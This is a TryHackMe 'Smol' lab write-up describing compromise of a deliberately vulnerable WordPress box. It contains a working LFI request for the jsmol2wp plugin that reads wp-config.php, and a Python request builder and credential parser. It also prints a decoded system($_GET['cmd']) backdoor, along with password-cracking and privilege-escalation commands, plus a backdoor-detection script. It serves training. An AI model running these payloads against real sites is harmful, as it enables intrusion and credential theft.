TryHackMe Smol Writeup

بِسْمِ اللَّهِ الرَّحْمَنِ الرَّحِيمِ

Room link: https://tryhackme.com/r/room/smol

Room description:

At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components.
Quick Tips: Do you know that on computers without a GPU, like the AttackBox, John The Ripper is faster than Hashcat?

Start with an nmap scan.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sV 10.10.187.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 05:49 EST
Nmap scan report for 10.10.187.53
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.42 seconds

We have two ports:

ssh on 22/tcp
http on 80/tcp

Visited the site served on port 80.

Explored the site and came across a WordPress login page; we can come back to this later.

Used WhatWeb to see what version of WordPress was running.

WordPress 6.4.3. The room description tells us this CMS has two vulnerable plugins, so let's run wpscan to find them.

wpscan --url http://<the-url> --enumerate p

Found one called jsmol2wp. (Note that --enumerate p only checks the list of popular plugins; ap enumerates all known plugins and vp only those with known vulnerabilities, at the cost of a longer scan.)

Now that we know which plugin it is, let's search for what it is vulnerable to. WPScan's own vulnerability database has an entry for this plugin: it is vulnerable to LFI (local file inclusion).

https://wpscan.com/vulnerability/ad01dad9-12ff-404f-8718-9ebbd67bf611/

PoC (Proof of Concept):

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Replace localhost and the port with the hostname/IP of the target (www.smol.thm in my case).

Found the config file. Because the php://filter wrapper returns the file's contents instead of executing them, the PHP source of wp-config.php comes back verbatim, including the database credentials. Those credentials also work on the WordPress login page we found earlier. Database credentials normally won't log you in to WordPress; here they do because the same password was reused for a WordPress account.
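As an added example (this is not code from the writeup or from the room), here is a small Python helper that builds the PoC request against the plugin endpoint, checks that a response actually looks like PHP source rather than an error page, and pulls the DB_* constants out of a wp-config.php. The base URL reuses the hostname from the writeup; the wp-config.php contents are constructed with placeholder credentials and are not the real file from the box.

```python
import re
from urllib.parse import urlencode

# Path of the vulnerable plugin endpoint, as given in the WPScan PoC above.
JSMOL_PATH = "/wp-content/plugins/jsmol2wp/php/jsmol.php"

# Constructed stand-in for what the LFI returns (NOT the real file from the box):
# a wp-config.php with placeholder credentials.
SAMPLE_WP_CONFIG = r"""<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'dbuser' );
define( 'DB_PASSWORD', 'S3cret-Example' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
$table_prefix = 'wp_';
"""


def jsmol_lfi_url(base: str, rel_path: str) -> str:
    """Build the PoC request. php://filter with a resource= and no filter chain
    hands back the target file's bytes as-is, so PHP source is returned rather
    than executed; rel_path is relative to the plugin's php/ directory."""
    params = {
        "isform": "true",
        "call": "getRawDataFromDatabase",
        "query": "php://filter/resource=" + rel_path,
    }
    # Keep '/' and ':' unencoded so the URL has the same shape as the PoC.
    return base.rstrip("/") + JSMOL_PATH + "?" + urlencode(params, safe="/:")


def looks_like_php_source(body: str) -> bool:
    """Sanity check on the response: a real hit starts with the PHP open tag;
    anything else is usually an error page or an empty result."""
    return body.lstrip().startswith("<?php")


# define('NAME', 'value') with either quote style. Values containing an escaped
# quote would need a fuller parser, which wp-config files do not normally need.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])([A-Z_]+)\1\s*,\s*(['"])(.*?)\3\s*\)""", re.S)


def parse_wp_config(src: str) -> dict:
    """Extract the DB_* constants from wp-config.php source."""
    return {m.group(2): m.group(4)
            for m in DEFINE_RE.finditer(src) if m.group(2).startswith("DB_")}


if __name__ == "__main__":
    print(jsmol_lfi_url("http://www.smol.thm", "../../../../wp-config.php"))
    if looks_like_php_source(SAMPLE_WP_CONFIG):
        creds = parse_wp_config(SAMPLE_WP_CONFIG)
        print(creds["DB_USER"], creds["DB_PASSWORD"])
```

The relative path is resolved from wp-content/plugins/jsmol2wp/php/, which is why four ../ steps are needed to reach the WordPress root; the same function with ../../hello.php reaches the Hello Dolly plugin file.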

Successfully logged in with the credentials and reached the dashboard; let's look around for the second plugin.

Went to the Pages tab on the left and found a page called Webmaster Tasks. It reveals that "Hello Dolly" is the second plugin, the one containing a backdoor. Hello Dolly is a single-file plugin (wp-content/plugins/hello.php), so we can read its source with the same LFI; ../../hello.php is resolved relative to wp-content/plugins/jsmol2wp/php/.

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php

Came across a suspicious base64-encoded string; let's decode it.

echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 --decode

Result of the decode:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 --decode

if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }
┌──(root㉿kali)-[/home/kali/Desktop]
└─# print "\143\155\x64"
cmd

┌──(root㉿kali)-[/home/kali/Desktop]
└─# print "\143\x6d\144"
cmd
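As an added example (not part of the original writeup, and not the box's actual hello.php), here is a small Python checker for exactly this kind of backdoor: it resolves PHP's octal and hex string escapes the way the zsh print calls above do, decodes literal base64_decode() arguments and flags request data passed straight into a command or code sink. The plugin file it scans is constructed for the example; only the base64 blob is the one shown on the page.

```python
import base64
import re

# The base64 blob recovered from hello.php in the writeup above.
BACKDOOR_B64 = ("CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRb"
                "IlwxNDNceDZkXDE0NCJdKTsgfSA=")

# Constructed stand-in for a plugin file carrying that blob; this is NOT the
# real hello.php from the box, only the shape such a backdoor takes.
SAMPLE_PLUGIN = """<?php
/*
Plugin Name: Hello Dolly
*/
function hello_dolly_get_lyric() {
    return "Hello, Dolly";
}
eval(base64_decode("%s"));
add_action( 'admin_notices', 'hello_dolly' );
""" % BACKDOOR_B64

_SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f",
                   "\\": "\\", "$": "$", '"': '"'}


def php_unescape(s: str) -> str:
    """Decode the escapes PHP accepts in double-quoted strings: \\ooo (1-3 octal
    digits), \\xhh (1-2 hex digits) and the simple one-character escapes.
    Unknown escapes are kept literally, as PHP does."""
    def repl(m):
        octal, hexv, simple = m.groups()
        if octal is not None:
            return chr(int(octal, 8) & 0xFF)
        if hexv is not None:
            return chr(int(hexv, 16))
        return _SIMPLE_ESCAPES.get(simple, "\\" + simple)
    return re.sub(r"\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(.))", repl, s, flags=re.S)


# Request data flowing straight into a command or code sink, e.g.
# system($_GET["..."]); the key is captured raw so its escapes can be resolved.
SINK_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(\s*"
    r"(\$_(?:GET|POST|REQUEST|COOKIE))\s*\[\s*([\"'])(.*?)\3\s*\]", re.S)
# base64_decode("...") with a literal argument: the usual way to hide a payload.
B64_RE = re.compile(r"base64_decode\s*\(\s*([\"'])([A-Za-z0-9+/=\s]+)\1\s*\)")


def find_backdoors(src: str) -> list:
    """Return findings for obfuscated input-to-sink patterns in PHP source.
    Literal base64 payloads are decoded and scanned recursively, since
    backdoors are frequently wrapped in more than one layer."""
    findings = []
    for m in B64_RE.finditer(src):
        try:
            payload = base64.b64decode(m.group(2)).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue
        findings.append({"kind": "base64_payload", "payload": payload.strip()})
        findings.extend(find_backdoors(payload))
    for m in SINK_RE.finditer(src):
        findings.append({"kind": "sink", "sink": m.group(1),
                         "source": m.group(2), "param": php_unescape(m.group(4))})
    return findings


if __name__ == "__main__":
    for finding in find_backdoors(SAMPLE_PLUGIN):
        print(finding)
```

Run over a plugin directory this reports both the hidden payload and the resolved parameter name (cmd), which is the inspection step the room description asks for before installing third-party code.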

Both escaped strings resolve to cmd, so the backdoor passes whatever arrives in the cmd GET parameter straight to system(). Since WordPress includes every active plugin file on each request, this is remote command execution (RCE) from any page of the site. Here's an example:

Time to get a shell.

Upgrade to a TTY shell:

python3 -c 'import pty; pty.spawn("/bin/sh")'

Got a shell, but no access to any of the users' home directories. We remember the database credentials from the config file, so there must be a MySQL server running; let's connect to it.

In the MySQL client:

show databases;
use wordpress;
show tables;
select * from wp_users;

We found some hashes; time to crack them using john. (WordPress stores phpass hashes, which start with $P$; if john does not detect the format on its own, add --format=phpass.)

Got the user.txt flag.

Time to escalate to get the root.txt flag.

Went to the gege user's home directory and found an old zipped WordPress backup, but couldn't access it due to permissions. Moved on to the next user, think, and found their private SSH key. This is useful: copy it to your local machine and use it to log in as think.

Checked and noticed that both users, gege and think, belong to the same group.

Switched to user gege to get his shell. Now we have access to the zipped WordPress file, but it's password protected. Download the zip from the remote host to your local machine. I tried using scp to copy the file to my local machine but had permission errors everywhere, so I did this instead:

Then go to the remote host and scp the file to your machine.

Now it's time to crack it. Use zip2john to extract the hash from the zip file (it writes to stdout, so redirect it into a file), then feed that file to john:

zip2john wordpress.old.zip > wp_hash
john wp_hash --wordlist=/usr/share/wordlists/rockyou.txt
john --show wp_hash

Now we can unzip the file and see what's inside. It contains a wp-config.php file; cat it and you will get this. Let's log in as the user xavi with his credentials.

Logged in and tried to get the root.txt flag, but we need to escalate first.

Ran sudo -l to see what xavi can run as sudo: all commands are allowed, so a simple sudo su gives root.

Got the root.txt flag.

Finally done. This room was actually challenging, thank you!

My Linkedin

My tryhackme profile


TryHackMe Smol Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Original link: https://infosecwriteups.com/tryhackme-smol-writeup-c43db13dee00?source=rss----7b722bfd1b8d---4
